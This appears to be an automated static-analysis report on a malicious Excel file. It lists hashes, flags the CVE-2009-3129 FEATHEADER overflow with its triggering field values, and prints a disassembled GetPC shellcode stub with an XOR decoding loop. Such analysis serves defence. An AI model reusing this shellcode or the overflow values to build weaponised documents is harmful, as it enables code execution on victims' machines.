Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 eb252827668ac127…

MALICIOUS

Office (OLE) / .XLS

Size: 25.5 KB
Created: 1996-12-17 01:32:42
Authoring application: Microsoft Excel
First seen: 2026-05-10
MD5: 0ebb4b599514117b9eb1d679001613d3
SHA-1: c551c0a793a0f1c5625d5952c5834455e74279aa
SHA-256: eb252827668ac1270df1c7f16ff67cb5925d04c5976a00e8e1c4cf8596bbe3e2
Risk score: 100

Malware Insights

The XLS file triggered a heuristic for an x86 GetPC stub, a pattern often associated with macro execution in older Office documents. No specific malicious content or URLs were extracted, but the pattern suggests that embedded VBA macros could be used for malicious purposes, such as downloading a second-stage payload. A definitive assessment would require further analysis of the macro code.

Heuristics (2)

  • CVE-2009-3129 — Excel FEATHEADER record overflow (severity: critical; rule: CVE_2009_3129, exact match)
    The workbook BIFF stream contains a FEATHEADER (Feature Header) record with an anomalous size (record_size=23, isf=2, cbHdrData=4294967295). Legitimate FEATHEADER records are tiny (under 100 bytes) and carry cbHdrData values that fit within the record body; the value here is the documented CVE-2009-3129 exploit primitive: cbHdrData drives a memcpy with an attacker-controlled size, leading to memory corruption and code execution in Excel 2007/2003.
  • x86 GetPC stub (CALL $+5; POP EDI) (severity: high; rule: SC_GETPC_CALL)
    Disassembly (attempted x86 opcode disassembly):
    00000D10  e800000000        call 0xd15
    00000D15  5f                pop edi
    00000D16  83c729            add edi, 0x29
    00000D19  66bbb32d          mov bx, 0x2db3
    00000D1D  57                push edi
    00000D1E  5e                pop esi
    00000D1F  33c9              xor ecx, ecx
    00000D21  66b90402          mov cx, 0x204
    00000D25  66ad              lodsw ax, word ptr [esi]
    00000D27  6685c0            test ax, ax
    00000D2A  740e              je 0xd3a
    00000D2C  668bd0            mov dx, ax
    00000D2F  6633d3            xor dx, bx
    00000D32  6685d2            test dx, dx
    00000D35  7403              je 0xd3a
    00000D37  668bc2            mov ax, dx
    00000D3A  66ab              stosw word ptr es:[edi], ax
    00000D3C  e2e7              loop 0xd25
    00000D3E  e6a6              out 0xa6, al
    00000D40  5f                pop edi
    00000D41  ae                scasb al, byte ptr es:[edi]
    00000D42  5f                pop edi
    00000D43  6d                insd dword ptr es:[edi], dx
    00000D44  e07b              loopne 0xdc1
    00000D46  e44d              in al, 0x4d
    00000D48  d7                xlatb
    00000D49  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
    00000D4A  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
    00000D4B  1d0000b3c4        sbb eax, 0xc4b30000
    00000D50  132c00            adc ebp, dword ptr [eax + eax]
    00000D53  003c68            add byte ptr [eax + ebp*2], bh
    00000D56  47                inc edi
    00000D57  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
    00000D58  f1                int1
    00000D59  2138              and dword ptr [eax], edi
    00000D5B  5d                pop ebp
    00000D5C  af                scasd eax, dword ptr es:[edi]
    00000D5D  803855            cmp byte ptr [eax], 0x55
    00000D60  bba4cec938        mov ebx, 0x38c9cea4
    00000D65  6a8f              push -0x71
    00000D67  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
    00000D68  e72a              out 0x2a, eax
    00000D6A  cb                retf
    00000D6B  2e64a6            cmpsb byte ptr fs:[esi], byte ptr es:[edi]
    00000D6E  e9                .byte 0xe9
    00000D6F  0d                .byte 0x0d